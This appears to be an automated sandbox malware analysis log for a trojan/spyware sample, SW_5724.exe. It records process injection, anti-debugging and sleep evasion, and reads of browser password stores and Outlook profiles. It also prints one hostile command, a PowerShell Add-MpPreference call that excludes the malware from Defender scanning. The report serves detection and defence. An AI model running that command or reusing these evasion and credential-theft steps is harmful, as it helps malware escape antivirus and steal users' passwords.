                Source: SW_5724.exe, 00000000.00000002.2102696975.000000000800D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2079014451.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000000.2044584459.0000000000552000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameqGyw.exe0 vs SW_5724.exe
                Source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameREGINI.EXEj% vs SW_5724.exe
                Source: SW_5724.exe, 00000006.00000002.2336234768.0000000001B4D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SW_5724.exe
                Source: SW_5724.exe | Binary or memory string: OriginalFilenameqGyw.exe0 vs SW_5724.exe
                Source: SW_5724.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SW_5724.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, qimOJmLpbCtpRP9n6S.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, qimOJmLpbCtpRP9n6S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, qimOJmLpbCtpRP9n6S.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, qimOJmLpbCtpRP9n6S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, qimOJmLpbCtpRP9n6S.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, qimOJmLpbCtpRP9n6S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@13/7@15/9
                Source: C:\Users\user\Desktop\SW_5724.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SW_5724.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\SW_5724.exe | Mutant created: \Sessions\1\BaseNamedObjects\cgFkuNI
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ty1tgju.kpa.ps1
                Source: SW_5724.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SW_5724.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\SW_5724.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: regini.exe, 0000000A.00000003.2632666532.0000000002979000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2632759668.0000000002965000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4514767041.0000000002965000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4514767041.000000000299A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SW_5724.exe | ReversingLabs: Detection: 42%
                Source: unknown | Process created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Users\user\Desktop\SW_5724.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SW_5724.exe | Process created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Users\user\Desktop\SW_5724.exe | Process created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SW_5724.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SW_5724.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SW_5724.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BmUrsTIvMw.exe, 00000009.00000002.4514409614.000000000019E000.00000002.00000001.01000000.0000000C.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4514410674.000000000019E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_5724.exe, SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.cs.Net Code: tAXFeekI1V System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.cs.Net Code: tAXFeekI1V System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.7770000.5.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.cs.Net Code: tAXFeekI1V System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_5724.exe.41f1d80.2.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00414774 push esp; retf 1CE7h6_2_0041478E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00402029 push FFFFFFFBh; retf 6_2_00402032
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0041A991 push ebp; iretd 6_2_0041A992
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00403230 push eax; ret 6_2_00403232
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00411AD3 push edi; retf 6_2_00411AD4
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004182B7 pushad ; iretd 6_2_004182B8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040D346 push ds; iretd 6_2_0040D347
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00412468 pushad ; iretd 6_2_0041247F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00418CCC push esp; retn 55EDh6_2_00418CD1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00412484 push 0000003Bh; retf 6_2_00412486
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040855D push es; ret 6_2_00408560
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00418D33 pushad ; retf 6_2_00418D85
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00417F3C push edi; ret 6_2_00417F57
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00404FF0 push esi; ret 6_2_00404FF1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A2225F pushad ; ret 6_2_01A227F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A227FA pushad ; ret 6_2_01A227F9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A509AD push ecx; mov dword ptr [esp], ecx6_2_01A509B6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A2283D push eax; iretd 6_2_01A22858
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A21366 push eax; iretd 6_2_01A21369
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D4225F pushad ; ret 10_2_02D427F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D427FA pushad ; ret 10_2_02D427F9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D4283D push eax; iretd 10_2_02D42858
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D709AD push ecx; mov dword ptr [esp], ecx10_2_02D709B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D41366 push eax; iretd 10_2_02D41369
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046E8A0 push edi; retf 10_2_0046E8A1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00474D09 push edi; ret 10_2_00474D24
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00475084 pushad ; iretd 10_2_00475085
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046F251 push 0000003Bh; retf 10_2_0046F253
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046F235 pushad ; iretd 10_2_0046F24C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046532A push es; ret 10_2_0046532D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047775E push ebp; iretd 10_2_0047775F
                Source: SW_5724.exeStatic PE information: section name: .text entropy: 7.776537038112395

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\SW_5724.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: SW_5724.exe PID: 7284, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\regini.exe; API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: E80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: 29D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: 2750000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: 4F50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: 5F50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: 6080000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: 7080000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: A010000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: B010000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: B4A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Memory allocated: C4A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_5724.exe; Code function: 6_2_01A9096E rdtsc 6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4999
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1842
                Source: C:\Windows\SysWOW64\regini.exe; Window / User API: threadDelayed 3451
                Source: C:\Windows\SysWOW64\regini.exe; Window / User API: threadDelayed 6522
                Source: C:\Users\user\Desktop\SW_5724.exe; API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\regini.exe; API coverage: 2.6 %
                Source: C:\Users\user\Desktop\SW_5724.exe TID: 7304; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092; Thread sleep count: 3451 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092; Thread sleep time: -6902000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092; Thread sleep count: 6522 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 8092; Thread sleep time: -13044000s >= -30000s
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112; Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112; Thread sleep count: 33 > 30
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112; Thread sleep time: -49500s >= -30000s
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112; Thread sleep count: 35 > 30
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe TID: 8112; Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe; Code function: 10_2_0047C7B0 FindFirstFileW,FindNextFileW,FindClose,10_2_0047C7B0
                Source: 174EBI30.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 174EBI30.10.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 174EBI30.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 174EBI30.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: C:\Users\user\Desktop\SW_5724.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SW_5724.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\SW_5724.exe | Code function: 6_2_01A9096E rdtsc 6_2_01A9096E
                Source: C:\Users\user\Desktop\SW_5724.exe | Code function: 6_2_00417913 LdrLoadDll, 6_2_00417913
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8656A mov eax, dword ptr fs:[00000030h]6_2_01A8656A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58550 mov eax, dword ptr fs:[00000030h]6_2_01A58550
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A58550 mov eax, dword ptr fs:[00000030h]6_2_01A58550
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A564AB mov eax, dword ptr fs:[00000030h]6_2_01A564AB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A844B0 mov ecx, dword ptr fs:[00000030h]6_2_01A844B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADA4B0 mov eax, dword ptr fs:[00000030h]6_2_01ADA4B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0A49A mov eax, dword ptr fs:[00000030h]6_2_01B0A49A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A504E5 mov ecx, dword ptr fs:[00000030h]6_2_01A504E5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4C427 mov eax, dword ptr fs:[00000030h]6_2_01A4C427
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E420 mov eax, dword ptr fs:[00000030h]6_2_01A4E420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E420 mov eax, dword ptr fs:[00000030h]6_2_01A4E420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4E420 mov eax, dword ptr fs:[00000030h]6_2_01A4E420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD6420 mov eax, dword ptr fs:[00000030h]6_2_01AD6420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8A430 mov eax, dword ptr fs:[00000030h]6_2_01A8A430
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88402 mov eax, dword ptr fs:[00000030h]6_2_01A88402
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88402 mov eax, dword ptr fs:[00000030h]6_2_01A88402
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A88402 mov eax, dword ptr fs:[00000030h]6_2_01A88402
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADC460 mov ecx, dword ptr fs:[00000030h]6_2_01ADC460
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7A470 mov eax, dword ptr fs:[00000030h]6_2_01A7A470
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7A470 mov eax, dword ptr fs:[00000030h]6_2_01A7A470
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7A470 mov eax, dword ptr fs:[00000030h]6_2_01A7A470
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0A456 mov eax, dword ptr fs:[00000030h]6_2_01B0A456
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E443 mov eax, dword ptr fs:[00000030h]6_2_01A8E443
